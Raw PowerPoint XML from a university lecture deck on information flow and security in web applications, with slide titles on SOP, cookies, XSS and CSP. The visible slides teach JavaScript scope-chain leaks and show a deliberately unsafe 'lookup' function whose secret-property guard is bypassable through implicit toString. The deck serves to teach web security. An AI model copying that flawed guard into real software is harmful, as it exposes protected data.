              <a:t>document.cookie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85378" y="49386"/>
            <a:ext cx="9134475" cy="1265238"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Function: this is bound to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078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Leaks via scope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145543204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using scope chain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930280" y="1346203"/>
            <a:ext cx="8628062" cy="5211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349" tIns="50674" rIns="101349" bIns="50674">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> x;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=3 ; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>y = x; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function Bar() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>y = x; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>x = x +1; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> x = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> y = 0;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Bar();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4787206" y="2642791"/>
            <a:ext cx="3313236" cy="179970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20" tIns="45710" rIns="91420" bIns="45710"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What’s the value of global x  and y after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ()? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and after Bar()? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1462135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Important detail: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	When a variable is not local to the object, then JavaScript  mounts the scope chain to look for the variable (analogous detail for properties in the prototype chain).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Security problem: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integrity: an attacker can write a variable higher up in the scope chain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Confidentiality: an attacker can read a variable higher up in the scope chain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(analogous problems for properties in the prototype chain).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:buNone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85378" y="49386"/>
            <a:ext cx="9134475" cy="1265238"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Leaks via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53973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Leaks via IMPLICIT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tostring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404177240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10741" y="1406528"/>
            <a:ext cx="9145016" cy="4019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1354" tIns="50676" rIns="101354" bIns="50676">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="569816" indent="-569816" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="35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lookup =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569816" indent="-569816" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="35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function(o, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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prop) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569816" indent="-569816" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="35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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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(prop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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=== </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty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3500" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>secretproperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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5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sz="35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{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569816" indent="-569816" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="35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	return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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5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unsafe!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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5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; }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569816" indent="-569816" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="35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else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569816" indent="-569816" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="35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	return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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o[prop]; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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} }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43014" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1906590" y="266704"/>
            <a:ext cx="59055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2" rIns="91424" bIns="45712">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3500" b="1" dirty="0"/>
              <a:t>Is this function safe?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75392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10741" y="1406528"/>
            <a:ext cx="9145016" cy="4019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1354" tIns="50676" rIns="101354" bIns="50676">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="569816" indent="-569816" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="35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lookup =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569816" indent="-569816" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="35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function(o, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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prop) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569816" indent="-569816" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="35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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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(prop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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=== </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty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3500" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>secretproperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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5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sz="35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{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569816" indent="-569816" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="35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	return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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5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unsafe!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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5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; }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569816" indent="-569816" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="35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else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569816" indent="-569816" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="35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	return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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o[prop]; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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} }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014413" y="5318128"/>
            <a:ext cx="8121650" cy="1737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354" tIns="50676" rIns="101354" bIns="50676">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0"/>
              <a:t>If  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>prop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0"/>
              <a:t>is not a string, JavaScript invokes the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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3500" dirty="0" err="1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3500" dirty="0"/>
              <a:t> method to convert the value to a string</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43014" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1906590" y="266704"/>
            <a:ext cx="59055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2" rIns="91424" bIns="45712">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3500" b="1" dirty="0"/>
              <a:t>Is this function safe?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06492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Clarté.thmx</Template>
  <TotalTime>52920</TotalTime>
  <Words>4590</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Personnalisé</PresentationFormat>
  <Paragraphs>979</Paragraphs>
  <Slides>114</Slides>
  <Notes>13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114</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="115" baseType="lpstr">
      <vt:lpstr>Clarté</vt:lpstr>
      <vt:lpstr>Information Flows in Web Apps</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Objectives of lectures on information flow</vt:lpstr>
      <vt:lpstr>Agenda: Privacy-Violating Information Flows</vt:lpstr>
      <vt:lpstr>Evaluation</vt:lpstr>
      <vt:lpstr>Today</vt:lpstr>
      <vt:lpstr>Let’s start! </vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr> Web Evolution </vt:lpstr>
      <vt:lpstr>Importance of Protecting Web Apps</vt:lpstr>
      <vt:lpstr>Security problems</vt:lpstr>
      <vt:lpstr>state in web apps</vt:lpstr>
      <vt:lpstr>HTTP: HyperText Transfer Protocol </vt:lpstr>
      <vt:lpstr>HTTP Request</vt:lpstr>
      <vt:lpstr>HTTP Response</vt:lpstr>
      <vt:lpstr>Uniform Resource Locators (URLs)</vt:lpstr>
      <vt:lpstr>How to keep state information on sessions? </vt:lpstr>
      <vt:lpstr>HTTP: Session in URL Example </vt:lpstr>
      <vt:lpstr>HTTP: Session in hidden field Example </vt:lpstr>
      <vt:lpstr>HTTP : Session in COOKIES</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>SECURITY BASIS: SOP </vt:lpstr>
      <vt:lpstr>Same origin policy:   “high level”</vt:lpstr>
      <vt:lpstr>Same Origin Policy for  DOM</vt:lpstr>
      <vt:lpstr>The same origin policy (SOP)</vt:lpstr>
      <vt:lpstr>Frame isolation</vt:lpstr>
      <vt:lpstr>The same origin policy (SOP)</vt:lpstr>
      <vt:lpstr>The same origin policy (SOP)</vt:lpstr>
      <vt:lpstr>The same origin policy (SOP)</vt:lpstr>
      <vt:lpstr>Isolation problems with SOP due to Frame Communication</vt:lpstr>
      <vt:lpstr>Frame isolation</vt:lpstr>
      <vt:lpstr>Guninski attack (permissive policy, 1999)</vt:lpstr>
      <vt:lpstr>Frame isolation</vt:lpstr>
      <vt:lpstr>Frame isolation</vt:lpstr>
      <vt:lpstr>Gadget Hijacking</vt:lpstr>
      <vt:lpstr>Gadget Hijacking</vt:lpstr>
      <vt:lpstr>Frame isolation</vt:lpstr>
      <vt:lpstr>Navigation policies</vt:lpstr>
      <vt:lpstr>Navigation policies</vt:lpstr>
      <vt:lpstr>Fragment Identifier Messaging</vt:lpstr>
      <vt:lpstr>HTML 5</vt:lpstr>
      <vt:lpstr>Reply Attack</vt:lpstr>
      <vt:lpstr>Fix: Improve the API (Standford)</vt:lpstr>
      <vt:lpstr>Example of PostMessage</vt:lpstr>
      <vt:lpstr>Security considerations postmessage</vt:lpstr>
      <vt:lpstr>Same origin policy for cookies</vt:lpstr>
      <vt:lpstr>Setting/deleting cookies by server</vt:lpstr>
      <vt:lpstr>Scope setting rules   (write SOP)</vt:lpstr>
      <vt:lpstr>Cookies are identified by  (name,domain,path)</vt:lpstr>
      <vt:lpstr>Reading cookies on server   (read SOP)</vt:lpstr>
      <vt:lpstr>Examples</vt:lpstr>
      <vt:lpstr>Client side read/write:     document.cookie</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Viewing/deleting cookies in Browser UI</vt:lpstr>
      <vt:lpstr>Cookie protocol problems</vt:lpstr>
      <vt:lpstr>Example 1:  login server problems</vt:lpstr>
      <vt:lpstr>Example 2:   “secure” cookies are not secure</vt:lpstr>
      <vt:lpstr>Interaction with the DOM SOP</vt:lpstr>
      <vt:lpstr>Questions on CSRF</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>Code injection</vt:lpstr>
      <vt:lpstr>Code injection</vt:lpstr>
      <vt:lpstr>What is XSS?</vt:lpstr>
      <vt:lpstr>Example 1: XSS Vulnerable code  </vt:lpstr>
      <vt:lpstr>Reflected XSS attack on example 1</vt:lpstr>
      <vt:lpstr>Example 2: XSS Vulnerable code  </vt:lpstr>
      <vt:lpstr>Stored XSS attack on example 2</vt:lpstr>
      <vt:lpstr>MySpace.com   (Samy worm)</vt:lpstr>
      <vt:lpstr>Notable XSS exploits</vt:lpstr>
      <vt:lpstr>Stored XSS using images</vt:lpstr>
      <vt:lpstr>Input data validation and filtering</vt:lpstr>
      <vt:lpstr>Output filtering / encoding</vt:lpstr>
      <vt:lpstr>Common encoding functions</vt:lpstr>
      <vt:lpstr>Existing Server-side Prevention</vt:lpstr>
      <vt:lpstr>Common Defenses – Prevention - Mitigation</vt:lpstr>
      <vt:lpstr>Content Security Policy (CSP) </vt:lpstr>
      <vt:lpstr>CSP Example</vt:lpstr>
      <vt:lpstr>CSP Example inlined script</vt:lpstr>
      <vt:lpstr>Inline event handlers are inline scripts</vt:lpstr>
      <vt:lpstr>Directives in CSP</vt:lpstr>
      <vt:lpstr>Source Values</vt:lpstr>
      <vt:lpstr>Recall XSS Vulnerable code  </vt:lpstr>
      <vt:lpstr>Reflected XSS attack on example 1</vt:lpstr>
      <vt:lpstr>Recall XSS Vulnerable app  </vt:lpstr>
      <vt:lpstr>Stored XSS attack on example 2</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>What about SOP and XSS?</vt:lpstr>
      <vt:lpstr>What about CSRF and XSS?</vt:lpstr>
      <vt:lpstr>Leaks via this</vt:lpstr>
      <vt:lpstr>Function: what’s the difference?</vt:lpstr>
      <vt:lpstr>Function: what’s the difference?</vt:lpstr>
      <vt:lpstr>Function: this is bound to window</vt:lpstr>
      <vt:lpstr>Leaks via scope</vt:lpstr>
      <vt:lpstr>Example using scope chain</vt:lpstr>
      <vt:lpstr>Leaks via Scope</vt:lpstr>
      <vt:lpstr>Leaks via IMPLICIT tostring</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Leaks via implicit toString invocation</vt:lpstr>
      <vt:lpstr>Leaks via EVAL</vt:lpstr>
      <vt:lpstr>The eval that men do</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Leaks via eval</vt:lpstr>
      <vt:lpstr>Leaks via NATIVE FUNCTIONS</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>What happens now?</vt:lpstr>
      <vt:lpstr>Leaks via native functions</vt:lpstr>
      <vt:lpstr>isolation without sop</vt:lpstr>
      <vt:lpstr>Example Anonymous Function</vt:lpstr>
      <vt:lpstr>Example Anonymous Function</vt:lpstr>
      <vt:lpstr>Anonymous functions</vt:lpstr>
      <vt:lpstr>General JavaScript security measures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du Web Diffus</dc:title>
  <dc:creator>trezk</dc:creator>
  <cp:lastModifiedBy>Tamara Rezk</cp:lastModifiedBy>
  <cp:revision>334</cp:revision>
  <cp:lastPrinted>1601-01-01T00:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-01-26T17:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-11-20T15:25:08Z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TC011813511033</vt:lpwstr>
  </property>
</Properties>
</file>